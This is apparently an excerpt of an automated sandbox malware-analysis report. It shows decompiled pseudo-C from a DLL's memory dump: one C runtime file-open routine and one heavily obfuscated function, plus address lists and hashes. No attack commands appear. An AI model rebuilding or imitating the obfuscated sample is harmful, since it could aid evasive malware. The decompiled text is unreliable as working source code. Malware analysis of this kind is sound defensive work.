                          0x7ff88c08f030
                          0x7ff88c08f033
                          0x7ff88c08f03a
                          0x7ff88c08f03d
                          0x7ff88c08f04c
                          0x7ff88c08f04f
                          0x7ff88c08f060
                          0x7ff88c08f06e
                          0x7ff88c08f07e
                          0x7ff88c08f081
                          0x7ff88c08f08c
                          0x7ff88c08f093
                          0x7ff88c08f09b
                          0x7ff88c08f0a1
                          0x7ff88c08f0b7
                          0x7ff88c08f0ca
                          0x7ff88c08f0d6
                          0x7ff88c08f0f3
                          0x7ff88c08f0fa
                          0x7ff88c08f0ff
                          0x7ff88c08f10a
                          0x7ff88c08f10f
                          0x7ff88c08f117
                          0x7ff88c08f123
                          0x7ff88c08f129
                          0x7ff88c08f150

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID: CreateNamedPipe
                          • String ID:
                          • API String ID: 2489174969-0
                          • Opcode ID: 676958c7396e2aded2e374393f5bc208b79977bc6edc0e319e61f5911db9d7ab
                          • Instruction ID: 18025f92efa216357433b609a1d5ea1d8b0e5d180b6b7e3825c4ab4812ca68b3
                          • Opcode Fuzzy Hash: 676958c7396e2aded2e374393f5bc208b79977bc6edc0e319e61f5911db9d7ab
                          • Instruction Fuzzy Hash: 7BA18B336046958ADB64CF26E844BED77A5F789B88F048136DE4D4BB48DF38E945CB10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 87%
                          			E00007FF87FF88C081E14(signed int __ecx, long long __rbx, signed char* __rdx, long long __rsi, char* __r9) {
                          				signed int _t47;
                          				signed int _t51;
                          				signed char _t52;
                          				void* _t53;
                          				void* _t59;
                          				void* _t62;
                          				void* _t81;
                          				signed int _t87;
                          				signed int _t88;
                          				void* _t95;
                          				void* _t96;
                          				void* _t99;
                          				void* _t127;
                          				intOrPtr* _t135;
                          				void* _t140;
                          				char* _t149;
                          				long long _t151;
                          				void* _t154;
                          				void* _t155;
                          				void* _t157;
                          				void* _t161;
                          				void* _t165;
                          
                          				_t137 = __rbx;
                          				_t161 = _t154;
                          				 *((long long*)(_t161 + 0x10)) = __rbx;
                          				 *((long long*)(_t161 + 0x18)) = _t151;
                          				 *((long long*)(_t161 + 0x20)) = __rsi;
                          				_push(_t165);
                          				_t155 = _t154 - 0x30;
                          				 *__r9 = 0;
                          				r10d = r10d & 0x0000003f;
                          				_t149 = __r9;
                          				_t87 = r8d;
                          				_t135 =  *((intOrPtr*)(0x8c0b4970 + (__ecx >> 6) * 8));
                          				if (( *(_t135 + (__ecx << 6) + 0x38) & 0x00000080) == 0) goto 0x8c082076;
                          				r15d = 0x74000;
                          				if ((r15d & r8d) != 0) goto 0x8c081e93;
                          				_t140 = _t161 + 8;
                          				 *(_t155 + 0x50) = 0;
                          				_t99 = E00007FF87FF88C084DDC(_t81, _t135, _t140);
                          				if (_t99 != 0) goto 0x8c082091;
                          				if (_t99 != 0) goto 0x8c081ece;
                          				asm("bts edi, 0xe");
                          				r15d = 2;
                          				if ((_t87 & r15d) == 0x4000) goto 0x8c081ee4;
                          				_t15 = _t140 - 0x10000; // 0x64000
                          				if ((0xffffbfff & _t15) == 0) goto 0x8c081ed2;
                          				_t18 = _t140 - 0x20000; // 0x54000
                          				if ((0xffffbfff & _t18) == 0) goto 0x8c081edf;
                          				_t21 = _t140 - 0x40000; // 0x34000
                          				_t47 = _t21;
                          				if ((0xffffbfff & _t47) != 0) goto 0x8c081ee6;
                          				 *__r9 = 1;
                          				goto 0x8c081ee6;
                          				_t88 = _t87 | _t47;
                          				goto 0x8c081e93;
                          				if ((_t88 & 0x00000301) != 0x301) goto 0x8c081ee6;
                          				 *((intOrPtr*)(__r9)) = r15b;
                          				goto 0x8c081ee6;
                          				 *__r9 = 0;
                          				if ((_t88 & 0x00070000) == 0) goto 0x8c082076;
                          				if (( *__rdx & 0x00000040) != 0) goto 0x8c082076;
                          				_t51 = __rdx[4] & 0xc0000000;
                          				if (_t51 == 0x40000000) goto 0x8c081f20;
                          				if (_t51 == 0x80000000) goto 0x8c081f4b;
                          				if (_t51 != 0xc0000000) goto 0x8c082076;
                          				_t52 = __rdx[8];
                          				if (_t52 == 0) goto 0x8c082076;
                          				if (_t52 - r15d <= 0) goto 0x8c081f3e;
                          				if (_t52 - 4 <= 0) goto 0x8c081f91;
                          				if (_t52 != 5) goto 0x8c082076;
                          				if (0 == 0) goto 0x8c082019;
                          				r8d = 3;
                          				 *(_t155 + 0x50) = 0;
                          				_t53 = E00007FF87FF88C085864(0, r14d, 0xc0000000, _t96, _t135, __rbx, _t155 + 0x50, _t157);
                          				if (_t53 <= 0) goto 0x8c081f6c;
                          				_t91 =  ==  ? 0 : 1;
                          				if (_t53 == 0xffffffff) goto 0x8c081fb6;
                          				if (_t53 == r15d) goto 0x8c081fcd;
                          				if (_t53 != 3) goto 0x8c082006;
                          				if ( *(_t155 + 0x50) != 0xbfbbef) goto 0x8c081fcd;
                          				 *_t149 = 1;
                          				goto 0x8c082019;
                          				r8d = r15d;
                          				E00007FF87FF88C085D68(_t135, _t140, _t155 + 0x50);
                          				if (_t135 == 0) goto 0x8c08201d;
                          				r8d = 0;
                          				E00007FF87FF88C085D68(_t135, _t140, _t155 + 0x50);
                          				if (_t135 != 0xffffffff) goto 0x8c081fc2;
                          				E00007FF87FF88C07E6A0(_t135);
                          				goto 0x8c082078;
                          				goto 0x8c081f43;
                          				if (( *(_t155 + 0x50) & 0x0000ffff) != 0xfffe) goto 0x8c081fe6;
                          				_t59 = E00007FF87FF88C07E6A0(_t135);
                          				 *_t135 = 0x16;
                          				goto 0x8c081fb6;
                          				if (_t59 != 0xfeff) goto 0x8c082006;
                          				r8d = 0;
                          				E00007FF87FF88C085D68(_t135, _t140, _t165);
                          				if (_t135 == 0xffffffff) goto 0x8c081fb6;
                          				 *_t149 = r15b;
                          				goto 0x8c082019;
                          				r8d = 0;
                          				E00007FF87FF88C085D68(_t135, _t140, _t165);
                          				if (_t135 == 0xffffffff) goto 0x8c081fb6;
                          				_t127 =  ==  ? 0 : 1;
                          				if (_t127 == 0) goto 0x8c082076;
                          				 *(_t155 + 0x50) = 0;
                          				if (_t127 == 0) goto 0x8c08203d;
                          				if ( *_t149 - 1 != 1) goto 0x8c08204a;
                          				 *(_t155 + 0x50) = 0xfeff;
                          				goto 0x8c08204e;
                          				 *(_t155 + 0x50) = 0xbfbbef;
                          				if (3 <= 0) goto 0x8c082076;
                          				r8d = 3;
                          				r8d = r8d;
                          				_t62 = E00007FF87FF88C084A0C(0, r14d, 0, 3, _t95, 0, _t137, _t155 + 0x50, _t149);
                          				if (_t62 == 0xffffffff) goto 0x8c081fb6;
                          				if (3 - 0 + _t62 > 0) goto 0x8c08204e;
                          				return 0;
                          			}

























                          0x7ff88c081e14
                          0x7ff88c081e14
                          0x7ff88c081e17
                          0x7ff88c081e1b
                          0x7ff88c081e1f
                          0x7ff88c081e26
                          0x7ff88c081e28
                          0x7ff88c081e34
                          0x7ff88c081e37
                          0x7ff88c081e4d
                          0x7ff88c081e50
                          0x7ff88c081e56
                          0x7ff88c081e60
                          0x7ff88c081e66
                          0x7ff88c081e6f
                          0x7ff88c081e71
                          0x7ff88c081e75
                          0x7ff88c081e7e
                          0x7ff88c081e80
                          0x7ff88c081e8d
                          0x7ff88c081e8f
                          0x7ff88c081e98
                          0x7ff88c081ea4
                          0x7ff88c081ea6
                          0x7ff88c081eb3
                          0x7ff88c081eb5
                          0x7ff88c081ebd
                          0x7ff88c081ebf
                          0x7ff88c081ebf
                          0x7ff88c081ec7
                          0x7ff88c081ec9
                          0x7ff88c081ecc
                          0x7ff88c081ece
                          0x7ff88c081ed0
                          0x7ff88c081edd
                          0x7ff88c081edf
                          0x7ff88c081ee2
                          0x7ff88c081ee4
                          0x7ff88c081eec
                          0x7ff88c081ef6
                          0x7ff88c081f04
                          0x7ff88c081f0f
                          0x7ff88c081f16
                          0x7ff88c081f1a
                          0x7ff88c081f20
                          0x7ff88c081f25
                          0x7ff88c081f2e
                          0x7ff88c081f33
                          0x7ff88c081f38
                          0x7ff88c081f45
                          0x7ff88c081f4b
                          0x7ff88c081f51
                          0x7ff88c081f5d
                          0x7ff88c081f64
                          0x7ff88c081f69
                          0x7ff88c081f6f
                          0x7ff88c081f74
                          0x7ff88c081f79
                          0x7ff88c081f87
                          0x7ff88c081f89
                          0x7ff88c081f8c
                          0x7ff88c081f91
                          0x7ff88c081f99
                          0x7ff88c081fa1
                          0x7ff88c081fa3
                          0x7ff88c081fab
                          0x7ff88c081fb4
                          0x7ff88c081fb6
                          0x7ff88c081fbd
                          0x7ff88c081fc8
                          0x7ff88c081fd7
                          0x7ff88c081fd9
                          0x7ff88c081fde
                          0x7ff88c081fe4
                          0x7ff88c081feb
                          0x7ff88c081fed
                          0x7ff88c081ff6
                          0x7ff88c081fff
                          0x7ff88c082001
                          0x7ff88c082004
                          0x7ff88c082006
                          0x7ff88c08200e
                          0x7ff88c082017
                          0x7ff88c082019
                          0x7ff88c08201b
                          0x7ff88c082022
                          0x7ff88c082029
                          0x7ff88c08202e
                          0x7ff88c082030
                          0x7ff88c08203b
                          0x7ff88c08203d
                          0x7ff88c08204c
                          0x7ff88c08204e
                          0x7ff88c082059
                          0x7ff88c082062
                          0x7ff88c08206a
                          0x7ff88c082074
                          0x7ff88c082090

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID: _get_daylight_invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 474895018-0
                          • Opcode ID: be638d611d0ffe0b5027be264a8367b695c78b4831f7ebfcc585b6cae8fb1a0e
                          • Instruction ID: 3c3c53013bf1284e1ab711757791328ca55dee9219cebb4abbe8714c5d121466
                          • Opcode Fuzzy Hash: be638d611d0ffe0b5027be264a8367b695c78b4831f7ebfcc585b6cae8fb1a0e
                          • Instruction Fuzzy Hash: 9971C222E1C25246FF748A6ADC4063962D1FF523F1F14C634DA6D866DADF7DE841CA00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 23%
                          			E00007FF87FF88C0783C0(signed int __ebx, void* __edi, signed int __rax, signed int __rcx, long long __rdx, signed int __rsi, long long __rbp, signed long long __r8, signed int __r10, long long __r12, signed int _a8, signed int _a16, signed int _a24, unsigned long long _a32) {
                          				long long _v48;
                          				long long _v56;
                          				long long _v64;
                          				long long _v88;
                          				signed long long _v96;
                          				signed long long _v104;
                          				long long _v112;
                          				signed char* _v120;
                          				signed long long* _v128;
                          				signed int _v136;
                          				char _v144;
                          				signed long long _v152;
                          				signed int _v160;
                          				long long _v168;
                          				long long _v176;
                          				long long _v184;
                          				signed long long _v192;
                          				signed long long _v200;
                          				signed int _t273;
                          				void* _t285;
                          				signed int _t286;
                          				signed int _t287;
                          				long long _t299;
                          				intOrPtr _t306;
                          				intOrPtr _t307;
                          				signed short _t319;
                          				signed char _t326;
                          				signed long long _t351;
                          				intOrPtr _t404;
                          				intOrPtr _t405;
                          				long long _t406;
                          				intOrPtr _t407;
                          				signed long long _t409;
                          				intOrPtr _t414;
                          				signed long long _t416;
                          				intOrPtr _t418;
                          				signed long long _t419;
                          				signed long long _t420;
                          				signed long long _t421;
                          				signed int _t423;
                          				signed long long _t426;
                          				signed long long _t427;
                          				long long _t431;
                          				intOrPtr _t433;
                          				signed long long _t434;
                          				signed long long _t435;
                          				signed long long _t437;
                          				signed long long _t438;
                          				intOrPtr _t445;
                          				signed long long _t447;
                          				signed long long _t448;
                          				signed long long _t449;
                          				signed long long _t455;
                          				long long _t460;
                          				long long _t461;
                          				signed long long _t463;
                          				intOrPtr _t467;
                          				signed long long _t472;
                          				signed long long _t479;
                          				signed int _t480;
                          				signed long long _t485;
                          				signed long long _t487;
                          				unsigned long long _t490;
                          				signed long long _t491;
                          				unsigned long long _t495;
                          				long long _t497;
                          				signed long long _t507;
                          				signed long long _t517;
                          				long long _t525;
                          				signed long long _t526;
                          				signed long long _t529;
                          				signed long long _t533;
                          				long long _t549;
                          				long long _t550;
                          				signed long long _t552;
                          				signed long long _t554;
                          				long long _t555;
                          
                          				_t512 = __r8;
                          				_t326 = __ebx;
                          				_t447 = __rcx + 1;
                          				_v136 = _t447;
                          				_v96 = __rax ^ 0x00001b22;
                          				_t404 =  *0x8c0b4138; // 0x0
                          				_t555 = __rdx;
                          				_v112 = 0x1a42;
                          				r13b = 0xa0;
                          				_t497 =  *((intOrPtr*)(_t404 + (__rcx + __rcx * 2) * 8));
                          				 *0x8c0b4148 =  *0x8c0b4148 - 1;
                          				_t405 =  *0x8c0b41a8; // 0x0
                          				_v88 = _t497;
                          				r10d =  *(_t405 + 0xabb) & 0x000000ff;
                          				_t406 =  *((intOrPtr*)(__rdx + 0x500));
                          				_t533 = __r10 | _t447;
                          				 *((long long*)(__rdx + 0x110 + (_t447 + _t447 * 2) * 8)) = _t406;
                          				_t448 = _t447 + 1;
                          				_v104 = _t533;
                          				_t455 = _t448 + _t448;
                          				 *((long long*)(__rdx + 0x500)) = _t406;
                          				_t407 =  *0x8c0b4140; // 0x0
                          				 *((intOrPtr*)(_t407 + _t455 * 8)) =  *((intOrPtr*)(_t407 + _t455 * 8)) + 0x1065;
                          				_t409 =  *0x8c0b4158; // 0x0
                          				r14d =  *0x8c0b41a0; // 0x0
                          				 *0x8c0b4170 = __rdx;
                          				if (r14d != ( *(_t409 + _t447) & 0x000000ff)) goto 0x8c078b61;
                          				_v48 = __rbp;
                          				_v56 = __rsi;
                          				_t351 = _t554 + _t554;
                          				_a8 = _t554 + _t554 * 2;
                          				_t44 = _t554 + 0xf; // 0xf
                          				r8d = _t44;
                          				_v64 = __r12;
                          				_t47 = _t555 + 0x100; // 0x1d2
                          				_a24 = _t554 * 4;
                          				_a32 = _t351;
                          				_a16 = r8d;
                          				asm("o16 nop [eax+eax]");
                          				_t273 = r14d -  *0x8c0b4194;
                          				_t525 = _t47 + _t448 * 8 + 8;
                          				 *0x8c0b4194 = _t273;
                          				_t507 = _t351;
                          				_t552 = r14d;
                          				_v120 = _t525;
                          				r9d =  *0x8c0b4130 & 0x0000ffff;
                          				_v128 = _t533 + _t448 * 8 + 0xc0;
                          				 *0x8c0b416c = _t273 / _t455;
                          				_t63 = _t512 + 0x61d; // 0x62c
                          				r8d = r13b & 0xffffffff;
                          				_t449 = _t448 + 1;
                          				_t71 = _t554 - 0x7e; // -126
                          				_v144 = _t71;
                          				_v152 = 0xc74;
                          				_v160 = _t63;
                          				_v168 = _t525;
                          				_t526 = _t552;
                          				_v176 = ( *(_v136 + _t449 * 2) & 0x000000ff) + r14d;
                          				_v184 = 0x8c;
                          				_v192 = __r8;
                          				_v200 = _t449;
                          				 *((intOrPtr*)(_t497 + 0xab3 + _t449 * 4)) = E00007FF87FF88C075CC0(__ebx & 0x000000ff, __edi, _v136, __rdx, _t449, _t526);
                          				 *0x8c0b4130 =  *0x8c0b4130 + 0x90e;
                          				_t485 =  *0x8c0b4198; // 0x0
                          				r8d =  *0x8c0b4194; // 0x0
                          				 *0x8c0b4198 = _t485 | _t485 ^ 0x00001f9f;
                          				_t460 =  *0x8c0b4170; // 0x0
                          				_t461 = _t460 + 1;
                          				_t414 =  *0x8c0b4160; // 0x0
                          				 *0x8c0b4170 = _t461;
                          				r9d =  *(_t414 + _t507) & 0x000000ff;
                          				_v144 = ( *(_t555 + _a8 * 8) & 0x000000ff) + r8b;
                          				_v152 = 0x1561;
                          				_v160 = r14d | 0x00001797;
                          				_v168 = _t526 - _t461;
                          				r9d = 0x14c7;
                          				_v176 = 0x4de - r8d;
                          				_v184 = 0x184d;
                          				_v192 =  *0x8c0b4134 &  *0x8c0b4158;
                          				_v200 = 0x7b217;
                          				_t285 = E00007FF87FF88C075CC0(0x28, __edi, _a8, __rsi | 0x00001a94, _t485 | _t485 ^ 0x00001f9f, _t526 - _t461);
                          				 *0x8c0b4134 =  *0x8c0b4134 * 0xde0;
                          				if ( *0x8c0b4170 - 0x1518 < 0) goto 0x8c078a08;
                          				if (( *0x8c0b4190 & 0x0000ffff) -  *((intOrPtr*)(0x1658 + _t449 * 4)) > 0) goto 0x8c078a08;
                          				if (_t285 - 0x1827 <= 0) goto 0x8c078919;
                          				_t416 =  *0x8c0b41a0; // 0x0
                          				_t463 = _v104;
                          				if ( *((long long*)(_t463 + _t416 * 8)) - 0x8c8 > 0) goto 0x8c078919;
                          				_t487 = _a16;
                          				if ( *((intOrPtr*)(_t555 + _t487 * 8)) - _t463 < 0) goto 0x8c078878;
                          				_t418 =  *0x8c0b4140; // 0x0
                          				if ( *((intOrPtr*)(_t418 + _t507 * 4)) - r14d < 0) goto 0x8c078878;
                          				_t286 =  *0x8c0b414c; // 0x0
                          				_t287 = _t286 + 1;
                          				 *0x8c0b414c = _t287;
                          				r10d = r10d & 0x00001d8d;
                          				_t419 = _t552;
                          				 *(_t555 + (_t287 + _t287) * 8) = _t419;
                          				_t549 =  *0x8c0b4170; // 0x0
                          				 *0x8c0b4120 =  *0x8c0b4120 ^ (r14w & 0xffffffff) + (r14w & 0xffffffff);
                          				_t550 = _t549 +  *((intOrPtr*)(_t555 + _t419 * 8));
                          				 *0x8c0b416c = ( *0x8c0b416c & 0x0000ffff) + 1;
                          				_t420 =  *0x8c0b4140; // 0x0
                          				_v184 =  *(_t555 + _t449 * 8) & 0x000000ff;
                          				_v192 = _t552;
                          				_v200 = 0x4a4;
                          				_t299 = E00007FF87FF88C090D70(( *(_t420 + (_t287 + _t287) * 4) & 0x000000ff) + r14b, _t420, _t550, _t552 | 0x00001d0f,  *((intOrPtr*)(_t555 + _t420 * 8)), _t550);
                          				_t517 = _a8;
                          				 *((long long*)(_t555 + _t420 * 8)) = _t299;
                          				_t421 =  *0x8c0b41a8; // 0x0
                          				 *_v128 = _t487;
                          				if ((r13b & 0xffffffff) == r14d) goto 0x8c078859;
                          				if ((_t421 ^ _t552) -  *((intOrPtr*)(_t555 + _t517 * 8)) < 0) goto 0x8c078859;
                          				_t423 =  *0x8c0b41a0; // 0x0
                          				_t467 =  *0x8c0b41a8; // 0x0
                          				if ( *((intOrPtr*)(_v136 + _t507)) != ( *(_t423 + _t467) & 0x000000ff)) goto 0x8c078ae9;
                          				 *0x8c0b416c = ( *0x8c0b416c & 0x0000ffff) * (r14w & 0xffffffff);
                          				goto 0x8c078aec;
                          				_t306 =  *0x8c0b4148; // 0x0
                          				r9d = 0xf5c;
                          				 *0x8c0b414c =  *0x8c0b414c ^ 0x01d2c800;
                          				_t307 = _t306 + 1;
                          				 *0x8c0b4148 = _t307;
                          				r8d = 0x1567;
                          				_v184 = 0xf3;
                          				_v192 = 0xb23;
                          				 *((intOrPtr*)(_t307 +  *0x8c0b41a8)) =  *((intOrPtr*)(_t307 +  *0x8c0b41a8)) + ( *_v120 & 0x000000ff |  *0x8c0b4120 | 0x0000001a);
                          				_t426 =  *0x8c0b4150; // 0x0
                          				 *0x8c0b4133 = 0x28;
                          				_v200 = _t426;
                          				 *0x8c0b4124 = E00007FF87FF88C090D70(( *0x8c0b4133 & 0x000000ff) + 0x00000080 &  *0x8c0b4123, _t426,  *(_t555 + _t552 * 8) + 0x105b, _t517,  *((intOrPtr*)(_t555 + _t420 * 8)), _t550);
                          				 *((long long*)(0x1786 + _t449 * 8)) = 0x95e;
                          				goto 0x8c078aec;
                          				_t490 =  *0x8c0b4124;
                          				r13b = r13b + 1;
                          				_t427 =  *0x8c0b4128; // 0x0
                          				_t472 = _t427 + _t490 * 4;
                          				 *_t472 =  *_t472 ^  *(_t555 + _t490 * 8);
                          				 *0x8c0b4124 =  *0x8c0b4124 - 1;
                          				 *0x8c0b4158 = _t552;
                          				 *(0x7e1 + _t472 * 8) =  *(0x7e1 + _t472 * 8) & (_t427 ^ 0x00000a78);
                          				_t529 =  *0x8c0b4170; // 0x0
                          				r8d =  *0x8c0b4132 & 0x000000ff;
                          				 *0x8c0b4170 = _t529 - 1;
                          				_t491 = _t490 >> 0xb;
                          				 *0x8c0b416c = ( *0x8c0b4120 & 0x0000ffff) * (_t517 & _t529 | _t552) / _t491 * 0x1639;
                          				_t431 =  *0x8c0b4138; // 0x0
                          				 *((long long*)(_t431 + _t552 * 8)) = _t431;
                          				_t433 =  *0x8c0b4138; // 0x0
                          				 *0x8c0b4180 = _t491 *  *(_t433 + 0xa760) * _t449 ^ 0x00000510;
                          				goto 0x8c078aec;
                          				_t434 =  *0x8c0b41a0; // 0x0
                          				r9d =  *(_t555 + _t552 * 8);
                          				r9d = r9d + _t326;
                          				_t435 = _v112;
                          				r8d =  *0x8c0b4132 & 0x000000ff;
                          				_v128 = _v128 - 8;
                          				_v120 = _v120 - 8;
                          				_v144 = 0x64;
                          				_v152 = _t552;
                          				_v160 = r9d;
                          				r9d = 0x775;
                          				_v168 =  *0x8c0b4124;
                          				_v112 = _t435 - 1;
                          				_t437 = _v96;
                          				r11d =  *(_t437 + _t552 * 2) & 0x0000ffff;
                          				_v176 = _t550;
                          				_v184 =  *0x5139;
                          				_v192 = _t435 ^ 0x00000eae;
                          				_v200 =  *(_t555 + _t434 * 8) ^ 0x000019a2;
                          				_t319 = E00007FF87FF88C075CC0(_t326 & 0x000000ff, r13b & 0xffffffff, _t437, _v136 &  *0x8c0b4180, (_t517 & _t529 | _t552) - _t491 * 0x1639, _t529 - 1);
                          				_t495 = _a32;
                          				 *0x8c0b4120 = _t319;
                          				 *((char*)(_t495 + _v136)) = 0xfb;
                          				r13b = r13b ^ 0x00000075;
                          				 *(_t555 + _a8 * 8) = _t495;
                          				goto 0x8c078aec;
                          				_t479 = _t437;
                          				r8d = _a16;
                          				r14d = r14d + 1;
                          				r8d = r8d + 1;
                          				_t438 =  *0x8c0b4158; // 0x0
                          				_a24 = _a24 + 4;
                          				_a8 = _a8 + 3;
                          				_a16 = r8d;
                          				_a32 = _a32 + 2;
                          				if (r14d == ( *(_t438 + _t479) & 0x000000ff)) goto 0x8c078520;
                          				r13b = r13b + 1;
                          				 *(_t555 + (_t449 - 1) * 8) = _t495;
                          				_t480 =  *0x8c0b41a0; // 0x0
                          				 *((long long*)(_t555 + _t479 * 8)) = _t480 - (_t495 >> 0xc) * 0x1aba -  *((intOrPtr*)(_t555 + _t479 * 8)) - 0x12b0;
                          				_t445 =  *0x8c0b4150; // 0x0
                          				 *0x8c0b4198 = _t445 -  *0x8c0b4198;
                          				return  *0x8c0b416c & 0x0000ffff;
                          			}
















































































                          0x7ff88c0783c0
                          0x7ff88c0783c0
                          0x7ff88c0783d7
                          0x7ff88c0783e1
                          0x7ff88c0783e6
                          0x7ff88c0783f2
                          0x7ff88c0783f9
                          0x7ff88c0783ff
                          0x7ff88c078408
                          0x7ff88c07840b
                          0x7ff88c078413
                          0x7ff88c078419
                          0x7ff88c078420
                          0x7ff88c078428
                          0x7ff88c078430
                          0x7ff88c078437
                          0x7ff88c07843a
                          0x7ff88c078442
                          0x7ff88c078450
                          0x7ff88c078461
                          0x7ff88c07846d
                          0x7ff88c078474
                          0x7ff88c07847b
                          0x7ff88c078490
                          0x7ff88c078497
                          0x7ff88c07849e
                          0x7ff88c0784ad
                          0x7ff88c0784b7
                          0x7ff88c0784bf
                          0x7ff88c0784c7
                          0x7ff88c0784cb
                          0x7ff88c0784d2
                          0x7ff88c0784d2
                          0x7ff88c0784de
                          0x7ff88c0784e6
                          0x7ff88c0784ed
                          0x7ff88c0784f8
                          0x7ff88c0784ff
                          0x7ff88c078517
                          0x7ff88c07852a
                          0x7ff88c078530
                          0x7ff88c078534
                          0x7ff88c07853e
                          0x7ff88c078543
                          0x7ff88c078546
                          0x7ff88c07854b
                          0x7ff88c07855c
                          0x7ff88c078561
                          0x7ff88c078568
                          0x7ff88c078581
                          0x7ff88c078588
                          0x7ff88c078595
                          0x7ff88c078599
                          0x7ff88c07859d
                          0x7ff88c0785a6
                          0x7ff88c0785ad
                          0x7ff88c0785b2
                          0x7ff88c0785b5
                          0x7ff88c0785ba
                          0x7ff88c0785c3
                          0x7ff88c0785cb
                          0x7ff88c0785d5
                          0x7ff88c0785dc
                          0x7ff88c0785e3
                          0x7ff88c0785ea
                          0x7ff88c078621
                          0x7ff88c078632
                          0x7ff88c078641
                          0x7ff88c07864a
                          0x7ff88c078651
                          0x7ff88c078658
                          0x7ff88c078676
                          0x7ff88c07867f
                          0x7ff88c078688
                          0x7ff88c07868c
                          0x7ff88c078691
                          0x7ff88c078697
                          0x7ff88c07869c
                          0x7ff88c0786a5
                          0x7ff88c0786aa
                          0x7ff88c0786b8
                          0x7ff88c0786d2
                          0x7ff88c0786d8
                          0x7ff88c0786ec
                          0x7ff88c0786fa
                          0x7ff88c078700
                          0x7ff88c078707
                          0x7ff88c078717
                          0x7ff88c078724
                          0x7ff88c078735
                          0x7ff88c07873b
                          0x7ff88c078746
                          0x7ff88c07874c
                          0x7ff88c078754
                          0x7ff88c07875a
                          0x7ff88c078765
                          0x7ff88c078772
                          0x7ff88c078780
                          0x7ff88c078788
                          0x7ff88c078792
                          0x7ff88c07879c
                          0x7ff88c0787aa
                          0x7ff88c0787b4
                          0x7ff88c0787d9
                          0x7ff88c0787dd
                          0x7ff88c0787e2
                          0x7ff88c0787eb
                          0x7ff88c0787f7
                          0x7ff88c078809
                          0x7ff88c07880d
                          0x7ff88c078824
                          0x7ff88c07882a
                          0x7ff88c078837
                          0x7ff88c078839
                          0x7ff88c078840
                          0x7ff88c078853
                          0x7ff88c078867
                          0x7ff88c078873
                          0x7ff88c078878
                          0x7ff88c07887e
                          0x7ff88c078884
                          0x7ff88c07888e
                          0x7ff88c078890
                          0x7ff88c078896
                          0x7ff88c0788ab
                          0x7ff88c0788b0
                          0x7ff88c0788c4
                          0x7ff88c0788cd
                          0x7ff88c0788d7
                          0x7ff88c0788ee
                          0x7ff88c078902
                          0x7ff88c078908
                          0x7ff88c078914
                          0x7ff88c078919
                          0x7ff88c078920
                          0x7ff88c078923
                          0x7ff88c07892f
                          0x7ff88c078937
                          0x7ff88c078939
                          0x7ff88c07893f
                          0x7ff88c07895a
                          0x7ff88c07896c
                          0x7ff88c078973
                          0x7ff88c078984
                          0x7ff88c07898e
                          0x7ff88c0789ad
                          0x7ff88c0789b4
                          0x7ff88c0789c7
                          0x7ff88c0789dd
                          0x7ff88c0789fc
                          0x7ff88c078a03
                          0x7ff88c078a08
                          0x7ff88c078a12
                          0x7ff88c078a1d
                          0x7ff88c078a2f
                          0x7ff88c078a4f
                          0x7ff88c078a5e
                          0x7ff88c078a64
                          0x7ff88c078a6a
                          0x7ff88c078a6f
                          0x7ff88c078a74
                          0x7ff88c078a79
                          0x7ff88c078a7f
                          0x7ff88c078a84
                          0x7ff88c078a89
                          0x7ff88c078a91
                          0x7ff88c078a96
                          0x7ff88c078a9b
                          0x7ff88c078aa0
                          0x7ff88c078aa5
                          0x7ff88c078aaa
                          0x7ff88c078aaf
                          0x7ff88c078ac9
                          0x7ff88c078ad5
                          0x7ff88c078adf
                          0x7ff88c078ae3
                          0x7ff88c078ae7
                          0x7ff88c078ae9
                          0x7ff88c078aec
                          0x7ff88c078af4
                          0x7ff88c078afe
                          0x7ff88c078b01
                          0x7ff88c078b0b
                          0x7ff88c078b18
                          0x7ff88c078b31
                          0x7ff88c078b39
                          0x7ff88c078b43
                          0x7ff88c078b6e
                          0x7ff88c078b87
                          0x7ff88c078b9c
                          0x7ff88c078bbe
                          0x7ff88c078bc1
                          0x7ff88c078bcf
                          0x7ff88c078bec

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
